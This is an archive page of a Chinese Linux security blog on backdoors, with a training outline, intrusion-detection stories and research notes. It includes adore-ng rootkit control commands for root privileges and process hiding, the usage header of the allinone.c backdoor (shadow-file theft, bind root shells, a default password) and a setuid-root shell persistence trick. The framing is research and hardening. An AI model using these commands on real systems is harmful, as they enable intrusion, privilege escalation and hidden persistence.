存档

文章标签 ‘linux后门’

Linux安全培训大纲

2011年12月7日 17 条评论

计划明年开始做Linux安全培训,主要围绕linux展开,除了安全基础知识之外,力求涵盖访问控制、身份验证、授权、审计、加密、完整性检查等内容(选修)。做了一个简单的大纲,欢迎大家提意见,所有非选修部分要求在半年内掌握。

目的:给刚加入部门的毕业生设立短期目标,明确实现通道,强化知识传递的有效和系统。

形式:视频录像+web点播,最后还会加上一些测试题。

分享范围:主要面向公司内部开放,但会对外部开放linux基础部分的内容,并对部分朋友开放渗透测试的内容。

感谢thanks@alipay的提醒,我把渗透测试的内容放在了安全加固之前,因为在知道如何破坏之后,谈加固才更有针对性。

感谢cnhawk 的建议,加入项目管理事前、事中、事后的内容,作为选修课程。

感谢apollo的建议,增加与工作中的关联程度,对应上具体的工作场景。

应同事要求,增加内核相关基础及安全加固知识,作为选修课程。

应腾讯微博网友要求,为重要的知识点增加练习题(考试)部分。增加wifi安全部分。

应同事要求,在相应增加扩展读物内容,以助于深入学习。

感谢sinbad建议,发一个素包子鉴定的linux安全工程师认证CBLSE。。。 :)

感谢茄子@360的建议,学习期间吃素的童鞋才可以学习选修课,考虑中 :)

TODO:

提取出3个月的内容,出个转正试题。

 

又一次惊心动魄的Linux入侵检测经历

2011年2月27日 14 条评论

06年写了一个《一次惊心动魄的linux肉鸡入侵检测经历》 http://netsecurity.51cto.com/art/200707/51611.htm,今天再来一篇《又一次惊心动魄的Linux入侵检测经历》,一些具体细节涉及朋友公司敏感信息,加上时间仓促,写的比较随意,大家凑合着当小说看看即可。

阅读全文…

linux ssh隧道后门及检测

2010年12月1日 4 条评论

刚才和两位英雄在群里讨论了下,我总结一下转过来,和大家分享。

阅读全文…

Linux后门系列之adore-ng

2010年5月3日 17 条评论

很久之前写的一个文章,自己转回来。奇了怪了,当时我测试是可以隐藏端口的,但我现在折腾又隐藏不了端口,答案很快就会出来 :)

找到原因了,东西还是原汁原味的好,遇到类似问题的请用原版,想知道问题出在哪的请自行diff。

阅读全文…

adore-ng也可以通过echo或者cat进行控制

2010年5月3日 没有评论

ava是控制adore-ng的工具,但如果不愿意装个ava问题也不大。

/* You can control adore-ng without ava too:
 *
 * echo > /proc/<ADORE_KEY> will make the shell authenticated,
 * echo > /proc/<ADORE_KEY>-fullprivs will give UID 0,
 * cat /proc/hide-<PID> from such a shell will hide PID,
 * cat /proc/unhide-<PID> will unhide the process
 */

allinone.c for HUC (2002.1)

2010年4月14日 2 条评论

“由于漏报、误报及检查成本的问题,不管是应用层的还是内核层的linux后门都非常难快速发现”,这是一个让人比较郁闷的实事;最近在研究linux后门的特征,不得不感叹一下:“lion作为红客联盟的灵魂人物,在2002年的时候对linux渗透这块的研究已经非常超前了,绝对算的上国内linux渗透界的开山鼻祖之一,看看这allinone.c的功能,完全为pentester度身定制,即使放在现在也是linux渗透利器。”

/************************************************************************
* allinone.c for HUC (2002.1)
*
* allinone.c is
* a Http server,
* a sockets transmit server,
* a shell backdoor,
* a icmp backdoor,
* a bind shell backdoor,
* a like http shell,
* it can translate file from remote host,
* it can give you a socks5 proxy,
* it can use for to attack, jumps the extension, Visits other machines.
* it can give you a root shell.:)
*
* Usage:
* compile:
* gcc -o allinone allinone.c -lpthread
* run on target:
* ./allinone
*
* 1.httpd server
* Client:
* http://target:8008/givemefile/etc/passwd
* lynx -dump http://target:8008/givemefile/etc/shadow > shadow
* or wget http://target:8008/givemefile/etc/shadow
*
* 2.icmp backdoor
* Client:
* ping -l 101 target (on windows)
* ping -s 101 -c 4 target (on linux)
* nc target 8080
* kissme:)   –> your password
*
* 3.shell backdoor
* Client:
* nc target 8008
* kissme:)   –> your password
*
* 4.bind a root shell on your port
* Client:
* http://target:8008/bindport:9999
* nc target 9999
* kissme:)   –> your password  
*
* 5.sockets transmit
* Client:
* http://target:8008/socks/:local listen port::you want to tran ip:::you want to tran port
* http://target:8008/socks/:1080::192.168.0.1:::21
* nc target 1080
*
* 6.http shell
* Client:
* http://target:8008/givemeshell:ls -al (no pipe)
*
* ps:
* All bind shell have a passwd, default is: kissme:)
* All bind shell will close, if Two minutes do not have the connection.
* All bind shell only can use one time until reactivates. 
*
*
* Code by lion, e-mail: lion@cnhonker.net
* Welcome to HUC Website, Http://www.cnhonker.com
*
* Test on redhat 6.1/6.2/7.0/7.1/7.2 (maybe others)
* Thx bkbll’s Transmit code, and thx Neil,con,iceblood for test.
*
************************************************************************/

http://packetstormsecurity.org/UNIX/penetration/rootkits/allinone.c

本地留rootshell技巧

2010年1月27日 1 条评论

bash和tcsh是行不通的,其他的ash bsh zsh ksh均可。具体操作比较简单,大概说一下cp /bin/ksh . ; chown root.root ksh; chmod 4755 ksh,然后执行ksh就可以获得root权限了;这一招虽然看似低俗,但某些时候还是很有用的。所以一般情况下把多余的shell删除可以在一定程度上增加黑客的入侵成本,没实施的同学可以考虑在标准化里面加入这个操作。看图说话。

阅读全文…